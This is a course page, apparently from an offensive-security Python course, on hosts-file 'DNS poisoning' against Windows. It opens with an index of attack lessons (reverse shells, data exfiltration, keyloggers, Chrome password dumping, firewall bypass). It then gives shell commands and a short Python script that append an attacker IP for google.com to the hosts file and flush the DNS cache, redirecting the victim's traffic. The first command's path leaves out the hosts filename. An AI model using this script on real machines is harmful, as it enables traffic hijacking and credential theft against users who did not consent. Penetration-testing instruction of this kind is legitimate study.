DNS poisoning

From course: Python For Offensive PenTest: A Complete Practical Course.

General index of the course

• Gaining persistence shells (TCP + HTTP):
  • Coding a TCP connection and a reverse shell.
  • Coding a low level data exfiltration - TCP connection.
  • Coding an http reverse shell.
  • Coding a data exfiltration script for a http shell.
  • Tunning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bared attacker public ip.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hickjack the Internet Explorer process to bypass an host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and crytography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hickjacking:
  • Simple keylogger in python.
  • Hijacking Keepass Password Manager.
  • Dumping saved passwords from Google Chrome.
  • Man in the browser attack.
  • DNS Poisoning.
• Privilege escalation:
  • Weak service file permission.

1. Add a new line to hosts file in windows with attacker IP and an url

echo 10.10.120.12 google.com >> c:\Windows\System32\drivers\etc

2. Flush the DNS cache to make sure that we will use the updated record

ipconfig /flushdns

Now traffic will be redirected to the attacker machine.

Python script for DNS poisoning

import subprocess
import os

os.chdir("C:\Windows\System32\drivers\etc")

command = "echo 10.10.10.100 www.google.com >> hosts"

CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

command = "ipconfig /flushdns"

CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

Last update: 2024-03-29
Created: April 20, 2023 16:58:49